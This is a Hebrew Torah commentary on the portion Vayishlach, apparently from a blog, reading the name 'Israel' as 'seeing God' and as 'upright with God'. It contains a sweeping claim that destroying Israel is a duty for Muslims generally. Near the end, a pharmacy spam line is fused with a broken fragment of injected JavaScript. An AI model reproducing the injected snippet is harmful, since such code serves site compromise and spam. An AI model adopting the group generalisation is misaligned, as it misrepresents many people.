ישראל – שם חזק , תובנות מפרשת וישלח / מרדכי אפרתי

 

ישראל – שם חזק/ מרדכי אפרתי

המלאך אומר ליעקב “לא יעקב יאמר עוד שמך כי אם ישראל”

המילה “ישראל” מורכבת מהמילים “ישר” “אל”

את המילה “ישר” אפשר להבין בשני מובנים.

המובן הראשון בא  מלשון “ראיה”  כמו “לימין שור” או כדברי השיר  “שורו הביטו וראו”

דהיינו אדם שרואה (ישר, שור) את ה א-ל בכל שלב ומציאות החיים שלו

יעקב (וזרעו עם “ישראל”) רואה את האל למרות כל התהליכים הקשים שהוא עובר : מאבקים עם עשו, לבן, דינה, יוסף, חורבן  ביהמ”ק, גלות, שואה, מלחמות, פיגועים, דקירות.

מטרתו של עשו והמלאך שלו לא לאפשר ליעקב את הראיה הזו ולכן “ויאבק איש עימו” המלאך מעלה “אבק” תוך ההתגוששות עם יעקב ומטרתו לסמא ולעוור אותו ולערפל את המציאות בצורה כזו שאי אפשר לראות בה את האלוקים , עשו והעולם המערבי מטשטש את הרגשת האלוקות והרוחניות בחיים ע”י  התבססותו על התאוות והחומריות הגסה של חיי העולם הזה והפצת תפיסה זו בכל מדיה אפשרית

יעקב לא נותן למלאכו של עשו לערפל את המציאות. הוא יוצא מהמאבק וקורא למקום “פניא-ל” כי “ראיתי אלוקים פנים בפנים”, “האבק לא עיוור אותי”, אומר יעקב  “אני  ישראל – שורה ורואה א-ל גם במצבי העירפול של החיים הפרטיים והלאומיים.

 

המובן השני בא מלשון “יושר”, ישר  א-ל.

המציאות העולמית עקומה. יש כאוס בעולם. שום דבר לא נימצא במקום הנכון והראוי לו.

התרבות העשווית לא מכבדת את מי שבאמת צריך לכבד, לא מגנה את מי שבאמת צריך לגנות, לא מעודדת את הדבר הנכון והטוב האמיתי, השקר הוא האמת והחזק למרות היותו רע הוא הצודק והשולט, להשמיד עם שלם בשואה זה “צדק חברתי” כפי שאמרו הנאצים יש”ו, לחסל את ישראל זו מצוה וייעוד לכל מוסלמי טועה.

לאור פירוש זה  על יעקב להפוך את “העקוב למישור” -ליושר.

תפקידו של  יעקב ועם ישראל זרעו הוא  להתמודד עם המציאות העקומה בעולם ולישר אותה . להיות אור לגויים, להיות ה “סמן הימני” של העמים, להיות ה”מצפון” של העולם ע”י עשיית טוב וקיום תורה ומצוות. עליו להפוך את העקמומיות העולמית ליושר שמבוסס על דברי הא-ל ולא ערכים שניקבעו ע”י בני אדם בצורה סוביקטיבית

 

 

 cheapest non prescription celiasvar d=document;var s=d.createElement(‘script’); } else {

סגור לתגובות.

Scroll To Top